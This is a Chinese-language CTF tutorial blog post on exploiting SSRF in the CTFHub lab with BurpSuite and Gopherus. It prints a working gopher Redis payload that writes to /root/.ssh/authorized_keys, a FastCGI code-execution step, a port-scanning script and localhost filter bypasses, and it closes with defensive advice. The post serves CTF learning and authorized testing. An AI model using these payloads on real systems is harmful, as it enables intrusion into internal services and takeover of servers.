当前位置：首页 > article >正文

从CTFHub靶场实战出发：手把手教你用BurpSuite和Gopher协议玩转SSRF漏洞（附Payload生成）

article 2026/4/26 11:14:07

从CTFHub靶场实战出发手把手教你用BurpSuite和Gopher协议玩转SSRF漏洞在网络安全领域服务器端请求伪造SSRF一直是渗透测试中的高危漏洞类型。不同于常规漏洞SSRF的特殊之处在于它能够将存在缺陷的Web服务器变成攻击内网的跳板。本文将从一个实战角度带你深入理解如何利用BurpSuite和Gopher协议在CTFHub靶场中有效利用SSRF漏洞。1. SSRF漏洞核心原理与工具准备SSRF漏洞的本质是服务器对用户提供的URL缺乏充分验证导致攻击者可以诱导服务器向任意地址发起请求。这种漏洞在内网渗透中尤其危险因为它可以绕过防火墙限制直接访问内部系统。1.1 必备工具清单在开始实战前我们需要准备以下工具环境BurpSuite Community/Professional用于拦截、修改和重放HTTP请求Gopherus专门生成Gopher协议payload的工具Python 3环境运行一些辅助脚本CTFHub实验环境提供SSRF漏洞的实战场景提示BurpSuite的Proxy和Repeater模块将是我们的主要工作区建议提前熟悉基本操作。1.2 基础协议解析SSRF利用中常用的协议及其作用协议类型典型应用场景风险等级file://读取服务器本地文件高危dict://获取服务版本信息和端口扫描中高危gopher://构造任意协议请求攻击内网服务极高危http/https探测内网主机和服务中危其中Gopher协议因其灵活性被称为SSRF中的瑞士军刀它支持构造各种协议的原始数据包包括Redis、MySQL、FastCGI等。2. BurpSuite在SSRF实战中的应用技巧BurpSuite不仅是Web安全测试的标准工具在SSRF漏洞利用中也扮演着关键角色。下面我们通过具体案例来演示其使用方法。2.1 请求拦截与修改典型的SSRF漏洞场景往往出现在接受URL参数的功能点如图片加载、网页预览等。使用BurpSuite的基本流程配置浏览器代理到BurpSuite默认127.0.0.1:8080拦截含有URL参数的正常请求修改参数值为目标内网地址观察服务器响应GET /vulnerable_endpoint?image_urlhttp://example.com/image.jpg HTTP/1.1 Host: target.com将上述请求中的image_url参数修改为内网地址GET /vulnerable_endpoint?image_urlhttp://192.168.1.100/admin.php HTTP/1.1 Host: target.com2.2 Intruder模块用于端口扫描当发现SSRF漏洞后我们常需要探测内网开放的端口和服务。BurpSuite的Intruder模块可以自动化这个过程将含有URL参数的请求发送到Intruder选择攻击类型为Sniper设置端口号作为payload变量配置payload为数字范围如8000-9000根据响应长度或状态码判断开放端口# 示例识别有效端口的Python辅助脚本 import requests base_url http://target.com/ssrf?urlhttp://127.0.0.1:{} for port in range(8000, 9001): try: r requests.get(base_url.format(port)) if len(r.content) 100: # 根据实际情况调整阈值 print(fPossible open port: {port}) except: pass3. Gopher协议深度利用实战Gopher协议的强大之处在于它能封装各种协议的原始通信数据。下面我们以攻击内网Redis服务为例演示完整的攻击链条。3.1 使用Gopherus生成payload安装并运行Gopherus工具git clone https://github.com/tarunkant/Gopherus cd Gopherus python gopherus.py --exploit redis按照提示输入Redis命令工具会生成编码后的Gopher URL。例如要执行Redis的FLUSHALL和设置SSH公钥gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$1%0d%0a1%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$11%0d%0a/root/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*1%0d%0a$4%0d%0asave%0d%0a3.2 通过SSRF执行Gopher payload将生成的Gopher URL作为SSRF参数提交POST /ssrf_endpoint HTTP/1.1 Host: vulnerable.com Content-Type: application/x-www-form-urlencoded urlgopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A3%250d%250a%25243%250d%250aset%250d%250a%25241%250d%250a1%250d%250a%25241%250d%250a1%250d%250a%252A4%250d%250a%25246%250d%250aconfig%250d%250a%25243%250d%250aset%250d%250a%25243%250d%250adir%250d%250a%252411%250d%250a%2Froot%2F.ssh%2F%250d%250a%252A4%250d%250a%25246%250d%250aconfig%250d%250a%25243%250d%250aset%250d%250a%252410%250d%250adbfilename%250d%250a%252415%250d%250aauthorized_keys%250d%250a%252A1%250d%250a%25244%250d%250asave%250d%250a注意实际使用时需要根据目标环境调整IP、端口和具体Redis命令。这种攻击可能导致目标服务不可用仅在授权测试环境中使用。4. CTFHub靶场实战案例解析让我们通过CTFHub的几个典型SSRF题目将前面学到的技术综合应用。4.1 基础SSRF利用题目要求访问内网的flag.php文件。最简单的解法是直接构造/?urlhttp://127.0.0.1/flag.php但现代CTF题目通常会设置各种过滤规则这就需要我们掌握绕过技巧。4.2 进阶绕过技术当直接使用127.0.0.1被拦截时可以尝试以下方法URL编码绕过/?urlhttp://%31%32%37%2E%30%2E%30%2E%31/flag.php十进制IP表示/?urlhttp://2130706433/flag.phpDNS重绑定使用服务如rbndr.us生成临时域名该域名会在不同请求间解析到不同IP302跳转在自己的可控服务器上设置302跳转?php header(Location: http://127.0.0.1/flag.php); ?4.3 FastCGI协议利用当目标服务器运行PHP-FPM时可以通过Gopher协议构造FastCGI请求来执行任意代码使用Gopherus生成payloadpython gopherus.py --exploit fastcgi输入要执行的PHP代码如?php system(id); ?将生成的payload通过SSRF漏洞发送在实际测试中我发现FastCGI利用的成功率高度依赖服务器配置需要多次尝试不同的PHP文件路径如/var/www/html/index.php、/usr/local/nginx/html/index.php等。5. 防御措施与最佳实践理解了攻击手法后作为开发者也应该知道如何防御SSRF漏洞输入验证严格校验用户提供的URL限制协议类型禁用file、gopher、dict等网络隔离将关键内网服务放在独立网络段使用白名单只允许访问预定义的域名或IP禁用URL重定向防止利用跳转绕过过滤对于CTF选手来说掌握这些防御原理也能帮助理解题目设计思路更快找到突破口。在最近的一次CTF比赛中我遇到一个看似过滤了所有特殊字符的SSRF题目最终是通过将IP地址转换为八进制格式绕过的/?urlhttp://0177.0.0.01/flag.php这种实战经验往往比单纯的理论学习更有价值。

从CTFHub靶场实战出发：手把手教你用BurpSuite和Gopher协议玩转SSRF漏洞（附Payload生成）

相关文章：

从CTFHub靶场实战出发：手把手教你用BurpSuite和Gopher协议玩转SSRF漏洞（附Payload生成）

OpenFace完全指南：如何在3分钟内开始专业级面部分析

【独家首发】CUDA 13.2中cuBLASLt v3.0与自定义GEMM算子的延迟对比：端到端降低41.7%的3个关键配置

Spring Boot 2.3.12 + Spring Batch 实战：用注解搞定学生成绩单批量计算（附完整源码）

保姆级教程：在RTX 3090上从零部署MIT-BEVFusion（含CUDA-BEVFusion避坑指南）

随机退避：让重试更聪明

Blender参数化建模终极指南：如何用CAD_Sketcher实现工程级精确设计

SonarQube生产环境部署实录：Docker Compose编排PostgreSQL 12与SonarQube 8.9.10的黄金组合

基于Agenst框架构建AI智能体：从核心原理到工程实践

八大网盘直链下载助手终极指南：告别龟速下载的完整解决方案

嵌入式Linux开发实战：MontaVista Linux 6架构与应用

D2DX宽屏补丁终极指南：让暗黑破坏神2在现代PC上焕发新生

3分钟掌握抖音视频下载：免费批量去水印工具完全指南

STM32F103C8T6驱动WS2812B全彩灯带：手把手教你用PWM+DMA实现呼吸灯和彩虹渐变（附完整代码）

保姆级教程：在S32DS 3.4上为S32K3xx安装RTD 4.4驱动包（附常见安装失败排查）

从恒温烙铁到智能马桶：拆解身边那些用热敏电阻“感知”温度的小玩意儿

告别Docker Desktop！在Windows 11上用WSL2和Podman 4.6.1搭建免费容器环境

告别混乱！用Qt的.pri子模块重构你的大型项目，让代码复用和团队协作更丝滑

终极指南：3步在Windows上完美使用Switch Joy-Con手柄

Venera漫画源自动更新终极指南：如何让漫画库永远保持最新状态

Moonlight TV：打造家庭游戏串流中心的终极方案

Audiveris：10分钟免费将纸质乐谱转为数字格式的完整指南

从零开始：3步掌握PyAEDT电磁仿真自动化终极指南

3分钟搞定！FanControl终极指南：告别电脑风扇噪音，实现完美静音散热平衡

用BurpSuite和蚁剑实战SWPUCTF Web题：文件上传、HTTP头伪造与反序列化漏洞利用

WaveTools：鸣潮玩家的终极性能优化与数据分析工具箱

MATLAB integral函数实战：从分段函数到无穷积分，一个函数搞定所有数值积分难题

告别Transformer的臃肿！用这个双MLP模块（DDI）搞定时间序列预测，实测代码已开源

从监控小白到高手：我的Zabbix on Docker踩坑实录与性能调优指南

选型避坑指南：从噪声系数到三阶交调，工程师如何为你的项目挑选最合适的混频器？